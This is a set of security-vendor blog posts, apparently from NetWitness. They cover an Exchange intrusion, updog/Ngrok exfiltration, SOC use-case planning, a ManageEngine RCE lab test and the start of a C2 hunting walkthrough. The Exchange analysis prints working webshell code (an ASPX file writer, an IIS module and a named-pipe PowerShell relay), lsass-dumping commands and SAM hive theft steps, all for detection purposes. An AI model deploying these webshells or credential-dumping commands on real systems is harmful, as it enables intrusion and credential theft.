powershell [System.IO.File]::WriteAllText('c:\program files\microsoft\exchange server\v15\frontend\httpproxy\owa\auth\a.aspx',[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJlcXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0uVmFsdWUpKTslPgo=')))

The webshell code decoded from above is:


<%@ Page Language="C#"%><%System.IO.File.WriteAllBytes(Request["p"],Convert.FromBase64String(Request.Cookies["c"].Value));%>
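The Base64 blob embedded in that PowerShell command can be verified independently, for example in Python:

```python
import base64

# Base64 blob from the attacker's webshell-upload command above.
blob = ("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkMjIiU+PCVTeXN0ZW0uSU8uRmlsZS5Xcml0ZUFsbEJ5dGVzKFJl"
        "cXVlc3RbInAiXSxDb252ZXJ0LkZyb21CYXNlNjRTdHJpbmcoUmVxdWVzdC5Db29raWVzWyJjIl0u"
        "VmFsdWUpKTslPgo=")
webshell_source = base64.b64decode(blob).decode("utf-8")
print(webshell_source)  # the one-line ASPX file-writer webshell shown above
```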


At this point the attacker performed some of the most common early-stage activities: credential harvesting, user and group lookups, some pings, and directory traversals.


The credential harvesting consisted of several common techniques:


Credential harvesting related activity

Used Sysinternals' ProcDump (pr.exe) to dump the lsass.exe process memory:

cmd.exe /c pr.exe -accepteula -ma lsass.exe lsasp

Used the comsvcs.dll technique to dump the lsass.exe process memory:

cmd /c tasklist | findstr lsass.exe
cmd.exe /c rundll32.exe c:\windows\system32\comsvcs.dll, Minidump 944 c:\windows\temp\temp.dmp full

Obtained copies of the SAM and SYSTEM hives for the purpose of harvesting local account password hashes. 

These files were then placed in public-facing Exchange folders and downloaded directly from the Internet:

cmd /c copy c:\windows\system32\inetsrv\system
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\system.js"

cmd /c copy c:\windows\system32\inetsrv\sam
"C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\ecp\sam.js"


In addition to the traditional ASPX-type webshells, the attacker introduced another type of webshell on the Exchange servers. Two files were uploaded under the c:\windows\temp\ folder to set up this new backdoor:




File System.Web.TransportClient.dll is the webshell, whereas file tmp.ps1 is a script to register this DLL with IIS. The contents of this script are shown below:


[System.Reflection.Assembly]::Load("System.EnterpriseServices, Version=, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a")            
$publish = New-Object System.EnterpriseServices.Internal.Publish
$name = (gi C:\Windows\Temp\System.Web.TransportClient.dll).FullName
$type = "System.Web.TransportClient.TransportHandlerModule, " + [System.Reflection.AssemblyName]::GetAssemblyName($name).FullName
c:\windows\system32\inetsrv\Appcmd.exe add module /name:TransportModule /type:"$type"


The decompiled code of the DLL is shown below (I am only showing part of the AES encryption key, to once again prevent the hijacking of such a webshell):


using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Security.Cryptography;
using System.Text;

namespace System.Web.TransportClient
{
  public class TransportHandlerModule : IHttpModule
  {
    public void Init(HttpApplication application)
    {
      application.BeginRequest += new EventHandler(this.Application_EndRequest);
    }

    private void Application_EndRequest(object source, EventArgs e)
    {
      HttpContext context = ((HttpApplication) source).Context;
      HttpRequest request = context.Request;
      HttpResponse response = context.Response;
      string keyString = "kByTsFZq********nTzuZDVs********";
      string cipherData1 = request.Params[keyString.Substring(0, 8)];
      string cipherData2 = request.Params[keyString.Substring(16, 8)];
      if (cipherData1 != null)
      {
        response.ContentType = "text/plain";
        string plain;
        try
        {
          string command = TransportHandlerModule.Decrypt(cipherData1, keyString);
          plain = cipherData2 != null ? TransportHandlerModule.Client(command, TransportHandlerModule.Decrypt(cipherData2, keyString)) : TransportHandlerModule.run(command);
        }
        catch (Exception ex)
        {
          plain = "error:" + ex.Message + " " + ex.StackTrace;
        }
        response.Write(TransportHandlerModule.Encrypt(plain, keyString));
      }
    }

    private static string Encrypt(string plain, string keyString)
    {
      byte[] bytes1 = Encoding.UTF8.GetBytes(keyString);
      byte[] salt = new byte[10]
      {
        (byte) 1, (byte) 2, (byte) 23, (byte) 234, (byte) 37,
        (byte) 48, (byte) 134, (byte) 63, (byte) 248, (byte) 4
      };
      byte[] bytes2 = new Rfc2898DeriveBytes(keyString, salt).GetBytes(16);
      RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
      rijndaelManaged1.Key = bytes1;
      rijndaelManaged1.IV = bytes2;
      rijndaelManaged1.Mode = CipherMode.CBC;
      using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
      using (MemoryStream memoryStream = new MemoryStream())
      using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateEncryptor(bytes1, bytes2), CryptoStreamMode.Write))
      {
        byte[] bytes3 = Encoding.UTF8.GetBytes(plain);
        memoryStream.Write(bytes2, 0, bytes2.Length);
        cryptoStream.Write(bytes3, 0, bytes3.Length);
        return Convert.ToBase64String(memoryStream.ToArray());
      }
    }

    private static string Decrypt(string cipherData, string keyString)
    {
      byte[] bytes = Encoding.UTF8.GetBytes(keyString);
      byte[] buffer = Convert.FromBase64String(cipherData);
      byte[] rgbIV = new byte[16];
      Array.Copy((Array) buffer, 0, (Array) rgbIV, 0, 16);
      RijndaelManaged rijndaelManaged1 = new RijndaelManaged();
      rijndaelManaged1.Key = bytes;
      rijndaelManaged1.IV = rgbIV;
      rijndaelManaged1.Mode = CipherMode.CBC;
      using (RijndaelManaged rijndaelManaged2 = rijndaelManaged1)
      using (MemoryStream memoryStream = new MemoryStream(buffer, 16, buffer.Length - 16))
      using (CryptoStream cryptoStream = new CryptoStream((Stream) memoryStream, rijndaelManaged2.CreateDecryptor(bytes, rgbIV), CryptoStreamMode.Read))
      {
        return new StreamReader((Stream) cryptoStream).ReadToEnd();
      }
    }

    private static string run(string command)
    {
      string str = "/c " + command;
      Process process = new Process();
      process.StartInfo.FileName = "cmd.exe";
      process.StartInfo.Arguments = str;
      process.StartInfo.UseShellExecute = false;
      process.StartInfo.RedirectStandardOutput = true;
      process.Start();
      return process.StandardOutput.ReadToEnd();
    }

    private static string Client(string command, string path)
    {
      string pipeName = "splsvc";
      string serverName = ".";
      Console.WriteLine("sending to : " + serverName + ", path = " + path);
      using (NamedPipeClientStream pipeClientStream = new NamedPipeClientStream(serverName, pipeName))
      {
        StreamWriter streamWriter = new StreamWriter((Stream) pipeClientStream);
        // (the pipe connect/write statements are elided in the decompiled output)
        return new StreamReader((Stream) pipeClientStream).ReadToEnd();
      }
    }

    public void Dispose()
    {
    }
  }
}


The registered DLL shows up in the IIS Modules as TransportModule:


IIS Module Installation


This DLL webshell is capable of executing commands directly via cmd.exe, or of sending the command to a pipe named splsvc. In this setup, the DLL acts as the pipe client, i.e., it sends data to the named pipe. To set up the other side of the pipe (the server side), the attacker executed this command:


cmd.exe /c WMIC /node:"." process call create "powershell -enc


The encoded data in the PowerShell command decodes to the following script, which sets up the pipe server:


$script = {
     $pipeName = 'splsvc'
     $cmd = Get-WmiObject Win32_Process -Filter "handle = $pid" | Select-Object -ExpandProperty commandline
     $list = Get-WmiObject Win32_Process | Where-Object {$_.CommandLine -eq $cmd -and $_.Handle -ne $pid}
     if ($list.length -ge 50) {
          $list | foreach-Object -process {stop-process -id $_.Handle}
     }
     function handleCommand() {
          while ($true) {
               Write-Host "create pipe server"
               $sid = new-object System.Security.Principal.SecurityIdentifier([System.Security.Principal.WellKnownSidType]::WorldSid, $Null)
               $PipeSecurity = new-object System.IO.Pipes.PipeSecurity
               $AccessRule = New-Object System.IO.Pipes.PipeAccessRule("Everyone", "FullControl", "Allow")
               $pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60, 'Byte', 'None', 32768, 32768, $PipeSecurity
               #$pipe = new-object System.IO.Pipes.NamedPipeServerStream $pipeName, 'InOut', 60
               $reader = new-object System.IO.StreamReader($pipe);
               $writer = new-object System.IO.StreamWriter($pipe);

               $path = $reader.ReadLine();
               $data = ''
               while ($true) {
                    $line = $reader.ReadLine()
                    if ($line -eq '**end**') {
                         break
                    }
                    $data += $line + [Environment]::NewLine
               }
               write-host $path
               write-host $data
               try {
                    $parts = $path.Split(':')
                    $index = [int]::Parse($parts[0])
                    if ($index + 1 -eq $parts.Length) {
                         $retval = iex $data | Out-String
                    } else {
                         $parts[0] = ($index + 1).ToString()
                         $newPath = $parts -join ':'
                         $retval = send $parts[$index + 1] $newPath $data
                         Write-Host 'send to next' + $retval
                    }
               } catch {
                    $retval = 'error:' + $env:computername + '>' + $path + '> ' + $Error[0].ToString()
               }
               Write-Host $retval
          }
     }
     function send($next, $path, $data) {
          write-host 'next' + $next
          write-host $path
          $client = new-object System.IO.Pipes.NamedPipeClientStream $next, $pipeName, 'InOut', 'None', 'Anonymous'
          $writer = new-object System.IO.StreamWriter($client)
          $reader = new-object System.IO.StreamReader($client);
          $resp = $reader.ReadToEnd()
     }
     $ErrorActionPreference = 'Stop'
}
Invoke-Command -ScriptBlock $script
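The interesting part of this script is its path-routing logic: the payload path is prefixed with an index and a host list (e.g. N:host1:host2), and each hop either executes the payload locally or forwards it to the next host's pipe. A Python re-implementation of just that branch logic, for clarity (the function name and return shape are mine):

```python
def route(path: str):
    """Mirror the pipe server's routing: the first path element is an index.
    If it points at the last element, the payload executes on this host;
    otherwise the index is incremented and the payload is forwarded to
    the next host named in the path."""
    parts = path.split(":")
    index = int(parts[0])
    if index + 1 == len(parts):
        return ("execute-here", None, None)
    parts[0] = str(index + 1)
    return ("forward", parts[index + 1], ":".join(parts))

print(route("0:HOST2"))  # first hop: forward to HOST2 with updated path "1:HOST2"
print(route("1:HOST2"))  # last hop: execute the payload locally
```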


From an EDR perspective, the interesting aspect of this type of webshell is that, other than the command that sets up the pipe server (which is executed via the w3wp.exe process), the subsequent commands are executed by the PowerShell pipe-server process, even though they still arrive through w3wp.exe. In fact, once the attacker set up this type of webshell in this intrusion, he/she deleted all of the initial ASPX-based webshells.


Webshell interaction


Although during this incident the pipe webshell was only used on the Exchange servers themselves, the script's path-routing and send function show that it is possible to chain commands through named pipes across multiple internal systems.


Webshell Data Decryption


In order to communicate with this webshell, the attacker issued the commands via the /ews/exchange.asmx page. Let's break down the communication with this webshell and highlight some of the characteristics that make it unique. Here is a sample command:


POST /ews/exchange.asmx HTTP/1.1
host: webmail.***************.com
content-type: application/x-www-form-urlencoded
content-length: 385
Connection: close


HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-FEServer: ***************
Date: Sat, 07 Mar 2020 08:10:43 GMT
Content-Length: 1606656

627Rf6z7SNyH+zHe0dEAcBAZDH2sEfyFUe2QQjK8J7M/QBU5vDGj***** REDACTED ******


The request to /ews/exchange.asmx is done in lowercase. While there are a couple of email clients that exhibit that same behavior, they can quickly be filtered out, especially when we see that the requests to this webshell do not even contain a User-Agent. We also notice that several of the other HTTP headers are in lowercase. Namely,

host: vs Host:

content-type: vs Content-Type:

content-length: vs Content-Length:
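A quick way to hunt for this client fingerprint in decrypted traffic or proxy logs is to compare header names against their canonical capitalisation. A Python sketch (the header list is a hypothetical sample, not the actual capture):

```python
def lowercase_header_anomalies(raw_headers):
    """Return header names that arrive fully lowercase even though
    mainstream clients send them capitalised (Host:, Content-Type:, ...)."""
    canonical = {"host", "content-type", "content-length"}
    flagged = []
    for line in raw_headers:
        name = line.split(":", 1)[0].strip()
        if name.lower() in canonical and name == name.lower():
            flagged.append(name)
    return flagged

sample = ["host: webmail.example.com",
          "content-type: application/x-www-form-urlencoded",
          "Connection: close"]
print(lowercase_header_anomalies(sample))  # ['host', 'content-type']
```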


The actual command follows the HTTP headers. Let's break down this command:




The beginning of the payload contains part of the AES encryption key. Namely, in the decompiled code shown above we notice that the AES key is: kByTsFZq********nTzuZDVs********


The data that follows the first 8 bytes of the key is shown below:




Let's decrypt this data step by step, and build a CyberChef recipe to do the job for us:


Steps 1–3: The obfuscated data needs to be URL decoded; however, the + character is a legitimate Base64 character that is misinterpreted by the URL decoder as a space. So, we first replace the + with a . (dot), URL decode, and then restore the + characters. The + character will not necessarily be in every chunk of Base64-encoded data, but we need to account for it in order to build an error-free recipe.


Decrypting: Step 1-3


Steps 4–5: At this point we can Base64 decode the data. However, the data we get from this step is binary in nature, so we also convert it to ASCII hex, since we need to use part of it for the AES IV.


Decryption: Step 4-5


Steps 6–7: The first 32 bytes of ASCII hex (16 bytes raw) are the AES IV, so in these two steps we use the Register function of CyberChef to store these bytes in $R0, and then remove them with the Replace function:


Decryption: Step  6-7


Step 8: Finally we can decrypt the data using the static AES key that we got from the decompiled code, and the dynamic IV value that we extracted from the decoded data.


Decryption: Step 8


The actual recipe is shown below:

Find_/_Replace(%7B'option':'Simple%20string','string':'%2B'%7D,'.',true,false,true,false)URL_Decode()Find_/_Replace(%7B'option':'Simple%20string','string':'.'%7D,'%2B',true,false,true,false)From_Base64('A-Za-z0-9%2B/%3D',true)To_Hex('None',0)Register('(.%7B32%7D)',true,false,false)Find_/_Replace(%7B'option':'Regex','string':'.%7B32%7D(.*)'%7D,'$1',true,false,true,false)AES_Decrypt(%7B'option':'Latin1','string':'kByTsFZqREDACTEDnTzuZDVsREDACTED'%7D,%7B'option':'Hex','string':'$R0'%7D,'CBC','Hex','Raw',%7B'option':'Hex','string':''%7D)
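The same chain can be reproduced outside CyberChef. A Python sketch of steps 1–7, isolating the IV and ciphertext (the sample payload is hypothetical; note that Python's urllib.parse.unquote, unlike CyberChef's URL Decode, leaves a literal + intact, so the dot-shielding trick is not needed here). The final AES-CBC decryption with the hardcoded key then requires a crypto library such as pycryptodome:

```python
import base64
import urllib.parse

def split_payload(form_value: str):
    """Steps 1-7: URL-decode, Base64-decode, then peel off the 16-byte
    AES IV that prefixes every ciphertext. Step 8 would be AES-CBC
    decryption of the ciphertext with the hardcoded key and this IV,
    e.g. with pycryptodome: AES.new(key, AES.MODE_CBC, iv).decrypt(ct)."""
    raw = base64.b64decode(urllib.parse.unquote(form_value))
    return raw[:16], raw[16:]

# Hypothetical payload: a 16-byte IV followed by a few ciphertext bytes.
sample = urllib.parse.quote(
    base64.b64encode(b"0123456789abcdef" + b"\xde\xad\xbe\xef").decode())
iv, ciphertext = split_payload(sample)
print(iv.hex(), ciphertext.hex())
```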


We use the same recipe to decode the second chunk of encoded data in the request (SryqIaK3fpejyDoOdyf9b%2Fi7aBqPAzBL1SUROVuScbc%3D), which ends up only decoding to the following:


Decryption: Part 2


The response does not contain any parts of the key, so we can just copy everything following the HTTP headers and decrypt with the same formula. Here is a partial view of the results of the command, which is just a file listing of the \Windows\temp folder:


Decrypt Response


NetWitness Platform - Detection


The malicious activity in this incident will be detected at multiple stages by NetWitness Endpoint, from the exploit itself to the webshell activity and the subsequent commands executed via the webshells. The easiest way to detect webshell activity, regardless of its type, is to monitor web daemon processes (such as w3wp.exe) for uncommon behavior. Uncommon behavior for such processes primarily falls into three categories:

  1. Web daemon process starting a shell process.
  2. Web daemon process creating (writing) executable files.
  3. Web daemon process launching uncommon processes (here you may have to filter out some processes based on your environment).
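As a sketch of how that triage logic could be encoded in your own tooling (the process lists and thresholds below are illustrative assumptions, not NetWitness's actual rule content):

```python
WEB_DAEMONS = {"w3wp.exe", "httpd.exe", "nginx.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
EXECUTABLE_EXTS = (".exe", ".dll", ".aspx", ".ps1")

def classify_w3wp_event(parent, child=None, written_file=None):
    """Bucket a process event into the three webshell-behaviour categories;
    events not involving a web daemon are ignored (return None)."""
    if parent.lower() not in WEB_DAEMONS:
        return None
    if child and child.lower() in SHELLS:
        return "web daemon spawned shell"
    if written_file and written_file.lower().endswith(EXECUTABLE_EXTS):
        return "web daemon wrote executable content"
    if child:
        return "web daemon spawned uncommon process"
    return None

print(classify_w3wp_event("w3wp.exe", child="cmd.exe"))
```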


NetWitness Endpoint 11.4 comes with various AppRules to detect webshell activity:


Webshell detection rules


The process tree will also reveal the commands that are executed via the webshell in more detail:


Process flow


Several other AppRules detect the additional activity, such as:

PowerShell Double Base64
Runs Powershell Using Encoded Command
Runs Powershell Using Environment Variables
Runs Powershell Downloading Content
Runs Powershell With HTTP Argument
Creates Local User Account


As part of your daily hunting you should also always review any Fileless_Scripts, which are common when encoded PowerShell commands are executed:


Fileless_Script events


From the NetWitness packet perspective, such network traffic is typically encrypted unless SSL interception is already in place. RSA highly recommends deploying such technology in your network to provide visibility into this type of traffic, which makes up a substantial share of the traffic in every network.


Once the traffic is decrypted, there are several aspects of this traffic that are grouped in typical hunting paths related to  the HTTP protocol, such as HTTP with Base64, HTTP with no user agent, and several others shown below:


Service Analysis


The webshell commands are found in the Query meta key:


Query meta key


To flag the lowercase request to /ews/exchange.asmx we need to set up a custom configuration using the SEARCH parser, which is disabled by default. We can do the same with the other lowercase headers, which are characteristics of whatever client the attacker is using to interact with this webshell. In the NetWitness Platform we can quickly set this up in the search.ini file of your decoder. Any hits for this string can then be referenced in AppRules by using the expression (found = 'Lowercase EWS'), and can be combined with other metadata.


Search.ini config




This incident demonstrates the importance of timely patching, especially when a working exploit is publicly available for a vulnerability. However, regardless of whether you are dealing with a known exploit or a 0-day, daily hunting and monitoring can lead to early detection and reduced attacker dwell time. The NetWitness Platform provides your team with the necessary visibility to detect and investigate such breaches.


Special thanks to Rui Ataide and Lee Kirkpatrick for their assistance with this case.


What's updog?

Posted by Lee Kirkpatrick Employee Mar 16, 2020

Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates, and supports HTTP basic auth. It was created by sc0tfree and can be found on his GitHub page. In this blog post we will use updog to exfiltrate information and show you the network indicators left behind by its usage.


The Attack

We are starting updog with all the default settings on the attacker machine; this means it will expose the directory we are currently running it from over HTTP on port 9090:


In order to quickly make updog publicly accessible over the internet, we will use a service called Ngrok. This service exposes local servers behind NATs and firewalls to the public internet over secure tunnels. The free version of Ngrok creates a randomised URL with a lifetime of 8 hours if you have not registered for a free account:


This now means that we can access our updog server over the internet using the randomly generated Ngrok URL, and upload a file from the victim's machine:


The Detection using NetWitness Network

An item of interest for defenders should be the use of services such as Ngrok. They are commonly utilised in phishing campaigns, as the generated URLs are randomised and short-lived. With a recent update to the DynDNS parser from William Motley, we now tag many of these services in NetWitness under the Service Analysis meta key with the meta value tunnel service:



Pivoting into this meta value, we can see there is some HTTP traffic to an Ngrok URL, an upload of a file called supersecret.txt, a suspicious-sounding Server Application called werkzeug/1.0.0 python/3.8.1, and a Filename with a PNG image named updog.png:



Reconstructing the sessions for this traffic, we can see the updog page as the attacker saw it, and we can also see the file that was uploaded by them:



NetWitness also gives us the ability to extract the file that was transferred to the updog server, so we can see exactly what was exfiltrated:


Detection Rules

The following table lists an application rule you can deploy to help with identifying these tools and behaviours:

Appliance: Packet Decoder
Description: Detects the usage of updog
Rule logic: server begins 'werkzeug' && filename = 'updog.png'
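The rule's logic can be mirrored in a few lines for testing against your own session metadata before deploying it (a hedged sketch; the dictionary layout is an assumption, while the field names follow the NetWitness meta keys shown above):

```python
def matches_updog_rule(meta):
    """Approximate the app rule:
    server begins 'werkzeug' && filename = 'updog.png'."""
    server = meta.get("server", "")
    filenames = meta.get("filename", [])
    return server.lower().startswith("werkzeug") and "updog.png" in filenames

print(matches_updog_rule({"server": "werkzeug/1.0.0 python/3.8.1",
                          "filename": ["updog.png", "supersecret.txt"]}))
```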





As a defender, it is important to monitor traffic to services such as Ngrok, as they can pose a significant security risk to your organisation. There are also multiple alternatives to Ngrok, and traffic to those should be monitored as well. In order for the new meta value tunnel service to start tagging these services, make sure to update your DynDNS Lua parser.


Security Operations Centres (SOCs) come in different forms (e.g. in-house, outsourced, hybrid) and sizes, depending on multiple factors such as the objectives and functions the SOC is meant to serve, as well as the intended scale of monitoring. However, in almost all SOCs there will be a SIEM, which acts as the brain of the SOC, picking up anomalies by correlating and making sense of the information coming in from various packet and log sources. More often than not, the efficiency of your SOC in detecting potential breaches in a timely manner depends very much on the SIEM itself: having the correct sizing and configuration, being integrated with the relevant data sources, and having the right Use Cases deployed, among others. In this post, we will focus on the strategy to plan and develop Use Cases that will lead to effective monitoring and detection in your SOC.


Prioritise your Use Case Development by Road-mapping

When you are first starting out on your SOC journey, many Use Cases may come to mind that cater to different threat scenarios. Most SOCs typically start with the Out-Of-The-Box (OOTB) Use Cases that are available; however, these will not be sufficient in the long run. Hence, there is a need to develop your own Use Cases on top of the OOTB ones. Use Case development is a lengthy and ongoing process, from identifying the problem statement to finetuning the Use Cases, and the threat landscape is constantly evolving. Therefore, it is always important to prioritise which Use Cases to develop first, and one of the best ways to do so is to come up with a roadmap.


When it comes to road-mapping your Use Case development, there are many good open-source references available, such as the MITRE ATT&CK framework and the VERIS framework, which are useful resources to aid you in your roadmap planning. However, it is important to note that while such frameworks are good references, they should not be taken wholesale when planning your organisation's Use Case development roadmap, since all organisations are unique and not all areas will be applicable. Prior to planning the roadmap, it is worthwhile to first perform a Priority Analysis, where you identify the priority areas on which the Use Cases should focus, based on factors such as the following:


  •      Existing threat profile including top known threats,


  •     Critical Assets and Services (note: It is extremely important for an organisation to have in place a well-defined methodology to regularly and systematically identify Critical Assets and Services as the outputs from such identification exercises are integral to many other parts of your security operations e.g. from deciding on the level of monitoring of an asset to assigning the appropriate severity level to an incident.)


  •      Critical Impact Areas to the organisation e.g. Financial, Reputation, Regulatory etc.


With the Priority Analysis being performed, you will then be able to identify which are your “Crown Jewels” and prioritise the protection efforts by developing the relevant Use Cases around them.


The Development Lifecycle

Once the priority areas have been identified, the next step will be to brainstorm for relevant Use Cases in these areas, before developing and finally deploying them into the SIEM. The following summarises the phases in a typical Use Case development lifecycle:


  1.       Define Problem Statement. This highlights the “problem” that you wish to solve (i.e. the threat that you wish to detect) and gives rise to the objective of the Use Case you are planning to develop. It is important to note that, in planning which Use Case to develop, the relevance of a Use Case should not be determined solely by the presence of indicators in past logs of the environment: the fact that an incident (e.g. a breach) has not happened before does not mean it will not occur in the future (refer to the Priority Analysis explained in the previous section for a recap on how to identify relevant Use Cases).


  2.       Develop High Level Logic. Once the objective of the Use Case is clear, the next step is to develop the high-level logic of the Use Case using pseudo code. This includes identifying the necessary parameters, such as the length of the “view” or “window” and the number of counts required to trigger the Use Case. Try to avoid focusing too much on the actual syntax at this stage, as this may cloud your thinking and increase the chances of introducing errors into your logic design.


  3.       Identify Data Requirements. Identify the packet and/or log sources that are required as inputs to the Use Case and check their availability in the production environment.


  4.      Check Live Resource or Internal Library. Based on the high-level logic developed, always look for similar existing Use Cases available in the Live Resource, community platforms, or your own internal Use Case library, instead of developing them from scratch, as this helps minimise development effort and reduces the chance of human error.


  5.     Development. Proceed to develop the Use Case in syntax form, either by modifying existing references or by developing from scratch if there are no alternatives.


  6.     Test & Deploy. Deploy the Use Case in a test or staging environment where possible, and simulate the threat scenario the Use Case is intended to detect to confirm it functions correctly, before deploying it in the production environment. Note that there is an option in NetWitness to deploy the Use Case as a Trial Rule.


  7.       Monitor False Positive & False Negative Rates. Once the rule has been successfully deployed into the SIEM, set up the necessary metrics to monitor the False Positive and False Negative rates.
  •  A high False Positive rate is likely to take a toll on the SOC operations in the long run, as unnecessary human resources and efforts would be spent on triaging all the false positives.


  •  Do note that while False Positives can be determined following triage, it is much more challenging to obtain an accurate picture of the False Negative rate, as this is only possible when you happen to learn of an actual breach where the relevant Use Case failed to trigger in your environment, i.e. you do not know what you do not know. In many instances, breaches can go undetected for a prolonged period of time, making the False Negative rate an extremely difficult metric to measure. Therefore, it is important to properly test the Use Case where possible, following initial deployment.


  1.      Finetune. Should you hold off deploying a particular Use Case for fear of introducing a high False Positive rate? High false positive rates are one of an analyst's nightmares, but that alone should not stop a Use Case from being deployed: it exists in the first place because of the "problem" you need to solve (as defined in your Problem Statement). Rather, deploy, monitor, and fine-tune the Use Case to reduce the False Positive rate over time. Be aware that this is not a one-time process; it may take several iterations of review and finetuning to stabilise the False Positive rate at an acceptable level.


  1.      Regular Review. As the threat landscape evolves constantly, put a process in place to conduct regular reviews of existing Use Cases, finetuning or even retiring them if they are no longer relevant, in order to maintain the overall detection efficiency of the SIEM.
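To make the "Monitor False Positive & False Negative Rates" step concrete, the False Positive rate can be tracked per Use Case from triage verdicts. A minimal sketch in Python (the verdict labels and sample data are illustrative, not tied to any NetWitness API):

```python
# Sketch: computing a per-Use-Case False Positive rate from triage
# outcomes, as a simple SOC metric. Verdict labels are illustrative.
from collections import Counter

def false_positive_rate(triage_results):
    """triage_results: list of 'TP' / 'FP' verdicts for one Use Case."""
    counts = Counter(triage_results)
    total = counts["TP"] + counts["FP"]
    return counts["FP"] / total if total else 0.0

# Example: 8 of 10 alerts raised by a Use Case were benign after triage.
rate = false_positive_rate(["FP"] * 8 + ["TP"] * 2)
print(rate)  # 0.8
```

Tracking this value per Use Case over time makes it easy to see whether finetuning iterations are actually driving the rate down.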



Now that the Use Case has been deployed into the environment, what is the next step? While the monitoring and detection part of the cycle has been taken care of, it is equally important to also ensure that we have a robust incident response mechanism in place. Apart from the Incident Response Framework which spells out the high-level response process, it is recommended to go into the second order of details to put in place the relevant Playbooks, which are step-by-step response procedures with tasks tagged to individual SOC roles and specific to different threat scenarios. As a good practice, such Playbooks should also be tagged to the relevant Use Cases that are deployed in your SOC. The following diagram summarises how we can make use of the playbooks during the Incident Response cycle depending on the maturity level of the SOC:


  1.       Printed Procedures. This is the least mature method to operate the Playbooks and is generally not recommended unless there are no other suitable alternatives.


  2.      Shared Spreadsheet. This is suitable for small-scale or newly set-up SOCs that are not ready to invest in a SIRP or SOAR yet. For each new case, the relevant playbook template can be pulled out, populated in an Excel spreadsheet (or equivalent), and deposited in a shared drive available to all SOC members. Analysts update the incident response actions they have taken, while the SOC Manager, Incident Handler, or Analyst Team Lead tracks the status of open cases through these spreadsheets.


  3.     SIRP. This is essentially an Incident Management Platform which allows analysts to easily apply the relevant playbooks and update the status of incidents in a centralised platform. Compared to the spreadsheet method, a SIRP allows for stricter access control, with the ability to define and enforce different levels of permissions across different roles in the platform, as well as to maintain an audit trail.


  4.      SOAR. This orchestrator provides a greater degree of automation in incident response compared to a SIRP, which can cut down response time and increase the overall efficiency of analysts.



To conclude, there is no one-size-fits-all solution when it comes to developing the Use Cases for your organisation. One recommended approach is to define a short-to-medium term Use Case development roadmap customised to your environment. The roadmap should be reviewed and revised from time to time to ensure it stays relevant to the constantly evolving threat landscape. In general, your SOC should have adequate coverage (in terms of monitoring, detection and response) across the different phases of the Cyber Kill Chain as shown below:



We hope that you find this useful in planning for the Use Cases to be developed in your organisation and happy building!

A zero-day RCE (Remote Code Execution) exploit against ManageEngine Desktop Central was recently released by ϻг_ϻε (@steventseeley). A full description of how this works, along with the code, can be found on his website. We thought we would give this a quick run through the lab to see what indicators it leaves behind.


The Attack

Here we simply run the script and pass two parameters, the target, and the command - which in this case is using cmd.exe to execute whoami and output the result to a file named si.txt:


We can then access the output via a browser and see that the command was executed as SYSTEM:


Here we execute ipconfig:


And grab the output:


The Detection in NetWitness Packets

The script sends an HTTP POST to the ManageEngine server, as seen below. It targets the MDMLogUploaderServlet over its default port of 8383, uploading a file with attacker-controlled content for the deserialization vulnerability to work. The command to be executed can also be seen in the body of the POST:

The traffic by default for this exploit is over HTTPS, so you would need SSL interception to see what is shown here.


This is followed by a GET request to the file that was uploaded via the POST for the deserialization to take place, which is what executes the command passed in the first place:


This activity could be detected by using the following logic in an application rule:

((service = 80) && (action = 'post') && (filename = 'mdmloguploader') && (query begins 'udid=')) || ((service = 80) && (action = 'get') && (directory = '/cewolf/'))


The Detection Using NetWitness Endpoint

To detect this RCE in NetWitness Endpoint, we have to look for Java doing something it normally shouldn't, as Java is what ManageEngine uses. It is not uncommon for Java to execute cmd, so the analyst has to look into the commands to understand whether the behaviour is normal or not. From the below we can see java.exe spawning cmd.exe and running reconnaissance-type commands, such as whoami and ipconfig; this should stand out as odd:


The following application rule logic could be used to pick up on this activity. Here we are looking for Java as the source of execution, as well as the string "tomcat" to narrow it down to the Apache Tomcat web servers that work as the backend for the ManageEngine application; the final part identifies fileless scripts or cmd.exe being executed by it:

(filename.src = 'java.exe') && (param.src contains 'tomcat') && (filename.dst begins '[fileless','cmd.exe')

Other java based web servers will likely show a similar pattern of behavior when being exploited.




As an analyst, it is important to stay up to date with the latest security news to understand if your organisation could potentially be at risk of compromise. Remote code execution vulnerabilities such as the one outlined here can be an easy gateway into your network, and any devices reachable from the internet should be monitored for anomalous behaviour such as this. Applications should always be kept up to date, and patches applied as soon as available, to avoid becoming a potential victim.

This post is going to cover a slightly older C2 framework from Silent Break Security called, Throwback C2. As per usual, we will cover the network and endpoint detections for this C2, but we will delve a little deeper into the threat hunting process for NetWitness as well.


The Attack

After installing Throwback and compiling the executable for infection (which in this case we will just drop and execute manually), we shortly see the successful connection back to the Throwback server:


Now that we have our endpoint communicating back with our server, we can execute typical reconnaissance-type commands against it, such as whoami:


Or tasklist to get a list of running processes:


This C2 has a somewhat slow beacon that by default is set to ~10 minutes, so we have to wait that amount of time for our commands to be picked up and executed:



Detection Using NetWitness Network

To begin hunting, the analyst needs to prepare a hypothesis of what it is they believe is currently taking place in their network. This process would typically involve the analyst creating multiple hypotheses, and then using NetWitness to prove, or disprove them; for this post, our hypothesis is going to be that there is C2 traffic - these can be as specific or as broad as you like, and if you struggle to create them, the MITRE ATT&CK Matrix can help with inspiration.


Now that we have our hypothesis, we can start to hunt through the data. The below flow is an example of how we do exactly that with HTTP:

  1. What we are looking for defines the direction. In this case, we are looking for C2 communication, which means our direction will be outbound (direction = 'outbound')
